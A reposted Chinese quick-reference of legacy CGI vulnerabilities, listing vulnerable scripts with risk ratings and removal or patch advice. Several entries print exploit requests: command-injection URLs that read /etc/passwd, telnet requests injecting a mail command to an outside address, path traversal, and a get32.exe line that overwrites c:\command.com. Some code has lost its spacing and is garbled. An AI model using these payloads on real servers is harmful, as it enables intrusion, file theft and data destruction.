欢迎光临
我们一直在努力
当前位置:IDC资讯中心 > 在线教程 > CGI > 正文

CGI安全漏洞资料速查v1.0(上)-CGI教程,CGI文档

2006-07-15 分类:CGI 阅读(1419) 评论(0)
建站超值云服务器,限时71元/月

cgi安全漏洞资料速查v1.0  

################################################################
#如有任何安全组织或个人愿意无尝对此文进行长期的、不间断地维护、
 更新或更改。请自行随便,不必与我商讨.但要求是成果必须完全地向
 internet公开。任何行为的私藏都是不受欢迎的。
#本文欢迎转摘.但请保持这些声明。
#如有任何问题或建议,请mailto:iwillsurewin@163.net
################################################################

类型:攻击型
名字:phf
风险等级:中
描述:在ncsa或者apache(1.1.1版本以内)非商业版本的webserver中
   有一段程序util.c,允许黑客以root身份执行任何一个指令:
http://www.xxx.com/cgi-bin/phf?qname=root%0asome%20command%20here
建议:无
解决方法:把apachewebserver升级到1.1.1以上,或者将ncsawebserver
     升级到最新版本

类型:攻击型
名字:wguset.exe
风险等级:中
描述:如果您使用nt做为您的webserver的操作系统,而且wguest.exe存
   在于您的web可执行目录中的话,入侵者将能利用它阅读到您的硬
   盘上所有usr_用户能阅读的文件
建议:将wguset.exe从你的web目录移走或删除
解决方法:将wguset.exe从你的web目录移走或删除

类型:攻击型
名字:rguset.exe
风险等级:中
描述:如果您使用nt做为您的webserver的操作系统,而且rguest.exe存
   在于您的web可执行目录中的话,入侵者将能利用它阅读到您的硬
   盘上所有usr_用户能阅读的文件
建议:将rguset.exe从你的web目录移走或删除
解决方法:将rguset.exe从你的web目录移走或删除

类型:攻击型
名字:perl.exe
风险等级:低
描述:在cgi-bin执行目录下存在perl.exe,这属于严重的配置错误。黑客
   可以在perl.exe后面加一串指令,利用浏览器在server上执行任何
   脚本程序
建议:perl.exe是放在任何带执行权限的web目录下都是不安全的
解决方法:在web目录下移除perl.exe这个程序.

类型:攻击型
名字:shtml.exe
风险等级:低
描述:如果您使用frontpage作为您的webserver,那么入侵者能够利用
   iusr_用户和shtml.exe入侵您的机器,做您不希望的事
建议:将shtml.exe从你的web目录移走或删除
解决方法:将shtml.exe从你的web目录移走或删除

类型:攻击型
名字:wwwboard.pl
风险等级:低
描述:wwwboard.pl程序容易引起攻击者对服务器进行d.o.s攻击
建议:如无必要可以删除该文件
解决方法:对get_variables的子程序中的下面这段:
if($form{followup}){$followup="1";
@followup_num=split(/,/,$form{followup});
$num_followups=@followups=@followup_num;
$last_message=pop(@followups);
$origdate="$form{origdate}";
$origname="$form{origname}";
$origsubject="$form{origsubject}";}

替换为:

if($form{followup}){
$followup="1";
@followup_num=split(/,/,$form{followup});
$num_followups=@followups=@followup_num;
$last_message=pop(@followups);
$origdate="$form{origdate}";
$origname="$form{origname}";
$origsubject="$form{origsubject}";
#wwwboardbombpatch
#writtenby:samuelsparlingsparling@slip.net)
$fn=0;
while($fn<$num_followups)
{
$cur_fup=@followups$fn];
$dfn=0;
foreach$fm(@followups)
{
if(@followups[$dfn]==@followups[$fn]&&$dfn!=$fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
#endwwwboardbombpatch
}

类型:攻击型
名字:uploader.exe
风险等级:中
描述:如果您使用nt作为您的webserver的操作系统,入侵者能够利用
   uploader.exe上传任何文件
建议:将uploader.exe从你的web目录移走或删除
解决方法:将uploader.exe从你的web目录移走或删除

类型:攻击型
名字:bdir.htr
风险等级:高
描述:如果您使用nt做为您的webserver的操作系统,而且bdir.htr存在
   于您的web可执行目录中的话,入侵者将能利用它在您的服务器上
   无止境的创建odbc数据库,并生成一些可执行的文件。
建议:将bdir.htr从你的web目录移走或删除
解决方法:将bdir.htr从你的web目录移走或删除

类型:攻击型
名字:count.cgi
风险等级:高
描述:在/cgi-bin目录下的count.cgi程序(wwwcount2.3版本)有一个溢出
   错误,允许入侵者无须登录而远程执行任何指令。
建议:如无必要可以删除该文件
解决方法:将wwwcount升级到2.4或者以上

类型:攻击型
名字:test-cgi
风险等级:高
描述:test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息
建议:建议审核cgi-bin目录下的执行程序,严格控制访问权限
解决方法:删除test-cgi文件

类型:攻击型
名字:nph-test-cgi
风险等级:高
描述:nph-test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息
建议:建议审核cgi-bin目录下的执行程序,严格控制访问权限
解决方法:删除nph-test-cgi文件

类型:攻击型
名字:php.cgi
风险等级:低
描述:php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任何系
   统文件可以被入侵者读取的漏洞
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除php.cgi程序是最好的办法

类型:攻击型
名字:handler
风险等级:低
描述:irix5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在缓存溢出
   错误,允许入侵者在server上远程执行一段程序:
   telnettarget.machine.com80
   get/cgi-bin/handler/whatever;cat/etc/passwd|?data=download
   http/1.0
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除handler文件

类型:攻击型
名字:webgais
风险等级:高
描述:/cgi-bin,目录下的webgais是gais搜索工具的一个接口,它有一个
   毛病使入侵者可以绕过程序的安全机制,执行系统命令:
   post/cgi-bin/webgaishttp/1.0
   content-length:85(replacethiswiththeactuallengthof
   the"exploit"line)
   telnettarget.machine.com80query=;mail+you\@your.host
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除webgais文件

类型:攻击型
名字:websendmail
风险等级:高
描述:/cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:
   telnettarget.machine.com80
   post/cgi-bin/websendmailhttp/1.0
   content-length:xxx(shouldbereplacedwiththeactual
   lengthofthestringpassedtotheserver,inthiscase
   xxx=90) receiver=;mail+your_address\@somewhere.org
   &content=a
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:高级用户:编辑websendmail脚本,过滤特殊字符
一般用户:删除websendmail文件

类型:攻击型
名字:webdist.cgi
风险等级:高
描述:对于irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点
   允许入侵者无须登录而在系统上执行任何指令:
   http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除/var/www/cgi-bin/webdist.cgi目录下的webdist.cgi

类型:攻击型
名字:faxsurvey
风险等级:高
描述:在linuxs.u.s.e上/cgi-bin目录下的faxsurvey程序允许入侵者无
   须登录就能在服务器执行指令:http://joepc.linux.elsewhere.org/
   cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除/cgi-bin/faxsurvey文件

类型:攻击型
名字:htmlscript
风险等级:中
描述:安装了htmlscript2.99x或者更早版本的服务器,存在一个毛病使
   入侵者可以查看服务器上的任何文件:
   http://www.vulnerable.server.com/cgi-bin/htmlscript?../../
   ../../etc/passwd
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除/cgi-bin/htmlscript脚本文件,或者将htmlscript升级到
     3.0以上

类型:攻击型
名字:pfdisplay
风险等级:中
描述:在irix6.4或者更早版本的web服务器上,/cgi-bin/pfdisplay程序
   允许入侵者非法查看服务器上的文件
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除/cgi-bin/pfdisplay文件,或者打补丁,补丁可以去
     sgigate.sgi.com(204.94.209.1)或者ftp.sgi.com下载:
     filename:readme.patch.3018
     algorithm#1(sum-r):3795511readme.patch.3018
     algorithm#2(sum):1545511readme.patch.3018
     md5checksum:1169eb51d75e0794c64c2c1fd6211b69
     filename:patchsg0003018
     algorithm#1(sum-r):016792patchsg0003018
     algorithm#2(sum):128762patchsg0003018
     md5checksum:bd16a53a0ae693d6e9e276ee066bdbc8
     filename:patchsg0003018.idb
     algorithm#1(sum-r):013392patchsg0003018.idb
     algorithm#2(sum):2512patchsg0003018.idb
     md5checksum:1cb16e6a8c50bf17cd02a29c2e4d35eb
     filename:patchsg0003018.performer_tools_man
     algorithm#1(sum-r):102018patchsg0003018.per-
     -former_tools_man
     algorithm#2(sum):31448patchsg0003018.performer_t-
     -ools_man
     md5checksum:b6b3d90fab9b5a342397c3e5af5a8d29
     filename:patchsg0003018.performer_tools_sw
     algorithm#1(sum-r):4847418patchsg0003018.perform-
     -er_tools_sw
     algorithm#2(sum):2817618patchsg0003018.performer_
     tools_sw
     md5checksum:df4e8ed8326a6a0b39f7b4d67e5fd71f

类型:攻击型
名字:www-sql
风险等级:中
描述:www-sql存在于/cgi-bin/目录下,这将导致入侵可以越权访问被保
   护的文件
建议:最好删除www-sql文件
解决方法:#ifphpfastcgi
     while(fcgi_accept()>=0)
     {
     #endif
     s=getenv("redirect_status");
     if(!s){
     puts("content-type:text/plain\r\n\r\nphp/fidetected
     aninternalerror.pleaseinformsa@hogia.netofwhat
     youjustdid.\n");
     exit(1);
     }
     s=getenv("path_translated");

类型:攻击型
名字:view-source
风险等级:高
描述:在cgi-bin目录下的view-source程序没有对输入进行安全检查,使
   入侵者可以查看服务器上的任何文件
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除/cgi-bin目录下的viewsource程序

类型:攻击型
名字:campas
风险等级:高
描述:在cgi-bin目录下的campas程序有一个毛病可以使入侵者随意查看
   server上的重要文件:
   telnetwww.xxxx.net80
   trying200.xx.xx.xx…
   connectedtovenus.xxxx.net
   escapecharacteris^].
   get/cgi-bin/campas?%0acat%0a/etc/passwd%0a
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除/cgi-bin目录下的campas程序

类型:攻击型
名字:aglimpse
风险等级:高
描述:在cgi-bin目录下的aglimpse程序有一个毛病可以使入侵者无须登
   录而随意执行任何指令 
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除/cgi-bin目录下的aglimpse程序

类型:攻击型
名字:at-admin.cgi
风险等级:中
描述:在exciteforwebservers1.1上的/cgi-bin/at-admin.cgi程序,允
   许普通用户完全控制整个系统
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除/cgi-bin目录下的at-admin.cgi程序

类型:攻击型
名字:finger
风险等级:中
描述:这个位于/cgi-bin下的finger程序,可以查看其它服务器的信息,
   但是如果将参数改成本机,本机上的帐号信息将暴露无遗:
   /cgi-bin/finger?@localhost
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除/cgi-bin目录下的finger程序

类型:攻击型
名字:webwho.pl
风险等级:中
描述:如果在您的web可执行目录中有webwho.pl这个cgi脚本,那么入侵
   者将能利用他阅读启动web的用户能读写执行的任何文件。
建议:将webwho.pl从您的web目录中删除或移走
解决方法:将webwho.pl从您的web目录中删除或移走

类型:攻击型
名字:w3-msql
风险等级:低
描述:minisql软件包发行版本附带的一个cgi(w3-msql)可被用于以
   httpd的uid权限执行任意代码。这个安全漏洞是由程序中的scanf()
   函数引起的。
建议:如果您安装了minisql软件包,请您将/cgi-bin/目录下的w3-msql文
   件删除或移走
解决方法:如果您安装了minisql软件包,请您将/cgi-bin/目录下的w3-msql
     文件删除或移走.或使用以下补丁。

补丁:

——w3-msql.patch———

410c410
scanf("%s",boundary); <br>—
<scanf("%128s",boundary);>
418c418
<strcat(var,buffer);
<strncat(var,buffer,sizeof(buffer));
428c428
<scanf("content-type:%s",buffer);>
<scanf("content-type:%15360s",buffer);>

——w3-msql.patch———

类型:攻击型
名字:netscapefasttrackserver2.0.1a
风险等级:中
描述:unixware7.1附带的netscapefasttrackserver2.0.1a存在一个远程
   缓冲区溢出漏洞。缺省地,监听457端口的httpd通过http协议提供
   unixware文档。如果向该服务器传送一个长度超过367字符的get请
   求,会使缓冲区溢出,eip值被覆盖将可能导致任意代码以httpd权
   限执行。
建议:临时解决方法是关闭netscapefasttrack服务器
解决方法:临时解决方法是关闭netscapefasttrack服务器。

类型:攻击型
名字:anyform.cgi
风险等级:高
描述:位于cgi-bin目录下的anyform.cgi程序,是用于简单表单通过邮件
   传递响应的,但该程序对用户输入检查不彻底,可被入侵者利用,
   在server上执行任何指令.
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:建议升级该cgi程序,或者删除该文件

类型:攻击型
名字:whois.cgi
风险等级:低
描述:在多个webserver中带有的whois.cgi存在溢出漏洞。它们包括:
whoisinterniclookup-version:1.02
ccwhois-version:1.0
mattswhois-version:1
  他们将使入侵者能够在您的系统上使用启动httpd用户的权限执行任
意的代码
建议:将在您web目录中问whois.cgi删除或移走
解决方法:将在您web目录中问whois.cgi删除或移走

类型:攻击型
名字:environ.cgi
风险等级:中
描述:在apachewebserver或者iis等其它webserver的/cgi-bin/environ.cgi
   程序,有一个毛病允许入侵者绕过安全机制,浏览服务器上的一些
   文件。
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:建议升级该cgi程序,或者删除该文件

类型:攻击型
名字:wrap
风险等级:中
描述:/cgi-bin/wrap程序有两个漏洞,均允许入侵者获取服务器上文件
   的非法访问,如:
   http://host/cgi-bin/wrap?/../../../../../etc
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除/cgi-bin/wrap文件

类型:攻击型
名字:edit.pl
风险等级:中
描述:/cgi-bin/edit.pl有一个安全弱点,用下面这条命令就可以访问用
   户的配置情况:
 http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
建议:建议审核cgi-bin目录,避免有不必要的程序存在
解决方法:删除/cgi-bin/edit.pl文件

类型:攻击型
名字:service.pwd
风险等级:中
描述:unix系统的http://www.hostname.com/_vti_pvt/service.pwd可读,
   将暴露用户密码信息
建议:建议删除
解决方法:chownrootservice.pwd chmod700service.pwd

类型:攻击型
名字:administrators.pwd
风险等级:中
描述:unix系统的http://www.hostname.com/_vti_pvt/administrators.pwd
   可读,将暴露用户密码信息
建议:建议删除
解决方法:chownrootadministrators.pwd chmod700administrators.pwd
相关连接: 

类型:攻击型
名字:users.pwd
风险等级:中
描述:unix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,
   将暴露用户密码信息
建议:建议删除
解决方法:chownrootusers.pwd chmod700users.pwd

类型:攻击型
名字:authors.pwd
风险等级:中
描述:unix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,
   将暴露用户密码信息
建议:建议删除
解决方法:chownrootauthors.pwd chmod700authors.pwd

类型:攻击型
名字:visadmin.exe
风险等级:中
描述:在omnihttpdwebserver的cgi-bin目录下存在这个文件visadmin.exe,
   那么攻击者只要输入下面的命令:
   http://omni.server/cgi-bin/visadmin.exe?user=guest数分钟之
   后服务器的硬盘将会被撑满
建议:建议删除
解决方法:把visadmin.exe从cgi-bin目录中删除

类型:攻击型
名字:get32.exe
风险等级:高
描述:alibaba的webserver,其cgi-bin目录存在get32.exe这个程序,允
   许入侵者任意执行一条指令:
http://www.victim.com/cgi-bin/get32.exe|echo%20>c:\command.com
建议:建议删除
解决方法:把get32.exe从cgi-bin目录中删除

类型:攻击型
名字:alibaba.pl
风险等级:高
描述:alibaba的webserver,其cgi-bin目录存在alibaba.pl这个程序,允
   许入侵者任意执行一条指令:
   http://www.victim.com/cgi-bin/alibaba.pl|dir
建议:建议删除
解决方法:把alibaba.pl从cgi-bin目录中删除

类型:攻击型
名字:tst.bat
风险等级:高
描述:alibaba的webserver,其cgi-bin目录存在tst.bat这个程序,允许
   入侵者任意执行一条指令:
http://www.victim.com/cgi-bin/tst.bat|type%20c:\windows\win.ini
建议:建议删除
解决方法:把tst.bat从cgi-bin目录中删除

类型:攻击型
名字:fpcount.exe
风险等级:低
描述:如果您使用nt作为您的webserver的操作平台,并只安装了sp3补丁,
   那么入侵者能利用这个cgi程序进行dos攻击,使您的iis服务拒绝
   访问。
建议:将在您web目录中的fpcount.exe删除或移走
解决方法:将在您web目录中的fpcount.exe删除或移走

类型:攻击型
名字:openfile.cfm
风险等级:低
描述:如果在您的web目录中含有
   /cfdocs/expeval/exprcalc.cfm
   /cfdocs/expeval/sendmail.cfm
   /cfdocs/expeval/eval.cfm
   /cfdocs/expeval/openfile.cfm
   /cfdocs/expeval/displayopenedfile.cfm
   /cfdocs/exampleapp/email/getfile.cfm
   /cfdocs/exampleapp/publish/admin/addcontent.cfm
  这些文件,那么入侵者可能能够利用它们读到您系统上的所有文件
建议:将在您web目录中的openfile.cfm删除或移走
解决方法:将在您web目录中的openfile.cfm删除或移走 

赞(0)
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com 特别注意:本站所有转载文章言论不代表本站观点! 本站所提供的图片等素材,版权归原作者所有,如需使用,请与原作者联系。未经允许不得转载:IDC资讯中心 » CGI安全漏洞资料速查v1.0(上)-CGI教程,CGI文档
分享到: 更多 (0)

相关推荐

热门标签

ldquo (1370)win (1324)活动 (1166)ios (1162)rdquo (818)微信 (747)iphone (728)小米 (722)windows (706)手机 (698)酷跑 (686)飞车 (540)天天 (492)qq (491)网站 (457)全民 (442)discuz (408)充值 (389)安装 (368)更新 (321)华为 (300)浏览器 (292)支付宝 (289)三星 (266)note (264)教程 (262)预览版 (261)小编 (258)越狱 (254)linux (248)

热门文章

分类目录